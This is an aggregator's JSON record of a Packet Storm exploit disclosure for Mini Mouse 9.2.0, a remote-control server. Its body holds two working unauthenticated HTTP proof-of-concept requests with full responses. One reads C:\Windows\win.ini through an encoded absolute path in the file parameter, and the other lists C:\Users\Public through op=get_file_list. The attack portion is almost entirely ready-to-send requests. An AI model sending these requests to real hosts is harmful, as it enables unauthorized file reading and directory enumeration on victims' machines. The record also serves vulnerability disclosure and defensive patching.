{"id": "PACKETSTORM:162079", "vendorId": null, "type": "packetstorm", "bulletinFamily": "exploit", "title": "Mini Mouse 9.2.0 Path Traversal", "description": "", "published": "2021-04-05T00:00:00", "modified": "2021-04-05T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://packetstormsecurity.com/files/162079/Mini-Mouse-9.2.0-Path-Traversal.html", "reporter": "gosh", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-04-05T15:34:07", "viewCount": 273, "enchantments": {"dependencies": {}, "score": {"value": 0.2, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.2}, "_state": {"dependencies": 1678920471, "score": 1678917189, "epss": 1679070268}, "_internal": {"score_hash": "03bbca061edb3c67b8f529727ad1a853"}, "sourceHref": "https://packetstormsecurity.com/files/download/162079/minimouse920-traversal.txt", "sourceData": "`# Exploit Title: Mini Mouse 9.2.0 - Path Traversal \n# Author: gosh \n# Date: 02-04-2021 \n# Vendor Homepage: http://yodinfo.com \n# Software Link: https://imgv.oss-cn-hangzhou.aliyuncs.com/minimouse.msi \n# Version: 9.2.0 \n# Tested on: Windows 10 Pro build 19042.662 \n \nPOC (file read: the server returns the file named by the absolute path in the file parameter; the path is absolute with URL-encoded backslashes (%5C), not a ../ sequence, and the request carries no credential or session header) \n \nGET /file=C:%5CWindows%5Cwin.ini HTTP/1.1 \nHost: 192.168.1.111:8039 \nContent-Type: application/json \nConnection: keep-alive \nAccept: */* \nUser-Agent: MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00) \nAccept-Language: en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8 \nContent-Length: 0 \nAccept-Encoding: gzip, deflate \n \n{} \n \n \n \n \n....................................................... 
\n \nHTTP/1.1 200 OK \nServer: bruce_wy/1.0.0 \nAccess-Control-Allow-Methods: POST,GET,TRACE,OPTIONS \nAccess-Control-Allow-Headers: Content-Type,Origin,Accept \nAccess-Control-Allow-Origin: * \nAccess-Control-Allow-Credentials: true \nP3P: CP=CAO PSA OUR \nContent-Type: application/octet-stream \nContent-Range: bytes 0-0/92 \nContent-Length : 92 \n \n; for 16-bit app support \n[fonts] \n[extensions] \n[mci extensions] \n[files] \n[Mail] \nMAPI=1 \n \n \nsecond POC (directory listing: op=get_file_list returns the contents of the directory named in the JSON path field; the request carries no credential or session header): \n \nPOST /op=get_file_list HTTP/1.1 \nHost: 192.168.1.111:8039 \nContent-Type: application/json \nConnection: keep-alive \nAccept: */* \nUser-Agent: MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00) \nAccept-Language: en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8 \nContent-Length: 28 \nAccept-Encoding: gzip, deflate \n \n{\"path\":\"C:\\\\Users\\\\Public\"} \n \n \n \n............................................................. \n \nHTTP/1.1 200 OK \nServer: bruce_wy/1.0.0 \nAccess-Control-Allow-Methods: POST,GET,TRACE,OPTIONS \nAccess-Control-Allow-Headers: Content-Type,Origin,Accept \nAccess-Control-Allow-Origin: * \nAccess-Control-Allow-Credentials: true \nP3P: CP=CAO PSA OUR \nContent-Type: application/json \nContent-Range: bytes 0-0/-1 \n \n{ \n\"ret_code\": 1, \n\"ret_msg\": \"success\", \n\"data\": { \n\"list\": [{ \n\"path\": \"C:\\\\Users\\\\Public\\\\AccountPictures\", \n\"is_hide\": true, \n\"is_floder\": true, \n\"name\": \"AccountPictures\", \n\"name_display\": \"AccountPictures\", \n\"file_size\": 0, \n\"create_time\": 1615677, \n\"update_time\": 1615737, \n\"sys_type\": 2 \n}, { \n\"path\": \"C:\\\\Users\\\\Public\\\\Desktop\", \n\"is_hide\": true, \n\"is_floder\": true, \n\"name\": \"Desktop\", \n\"name_display\": \"Desktop\", \n\"file_size\": 0, \n\"create_time\": 1575713, \n\"update_time\": 1617276, \n\"sys_type\": 2 \n}, { \n\"path\": \"C:\\\\Users\\\\Public\\\\desktop.ini\", \n\"is_hide\": true, \n\"is_floder\": false, \n\"name\": \"desktop.ini\", \n\"name_display\": \"desktop\", 
\n\"file_size\": 174, \n\"create_time\": 1575713, \n\"update_time\": 1575713, \n\"sys_type\": 2 \n}, { \n\"path\": \"C:\\\\Users\\\\Public\\\\Documents\", \n\"is_hide\": false, \n\"is_floder\": true, \n\"name\": \"Documents\", \n\"name_display\": \"Documents\", \n\"file_size\": 0, \n\"create_time\": 1575713, \n\"update_time\": 1575713, \n\"sys_type\": 2 \n}, { \n\"path\": \"C:\\\\Users\\\\Public\\\\Downloads\", \n\"is_hide\": false, \n\"is_floder\": true, \n\"name\": \"Downloads\", \n\"name_display\": \"Downloads\", \n\"file_size\": 0, \n\"create_time\": 1575713, \n\"update_time\": 1575713, \n\"sys_type\": 2 \n}, { \n\"path\": \"C:\\\\Users\\\\Public\\\\Libraries\", \n\"is_hide\": true, \n\"is_floder\": true, \n\"name\": \"Libraries\", \n\"name_display\": \"Libraries\", \n\"file_size\": 0, \n\"create_time\": 1575713, \n\"update_time\": 1575714, \n\"sys_type\": 2 \n}, { \n\"path\": \"C:\\\\Users\\\\Public\\\\Music\", \n\"is_hide\": false, \n\"is_floder\": true, \n\"name\": \"Music\", \n\"name_display\": \"Music\", \n\"file_size\": 0, \n\"create_time\": 1575713, \n\"update_time\": 1575713, \n\"sys_type\": 2 \n}, { \n\"path\": \"C:\\\\Users\\\\Public\\\\Pictures\", \n\"is_hide\": false, \n\"is_floder\": true, \n\"name\": \"Pictures\", \n\"name_display\": \"Pictures\", \n\"file_size\": 0, \n\"create_time\": 1575713, \n\"update_time\": 1575713, \n\"sys_type\": 2 \n}, { \n\"path\": \"C:\\\\Users\\\\Public\\\\Videos\", \n\"is_hide\": false, \n\"is_floder\": true, \n\"name\": \"Videos\", \n\"name_display\": \"Videos\", \n\"file_size\": 0, \n\"create_time\": 1575713, \n\"update_time\": 1575713, \n\"sys_type\": 2 \n}] \n} \n} \n`\n"}
{}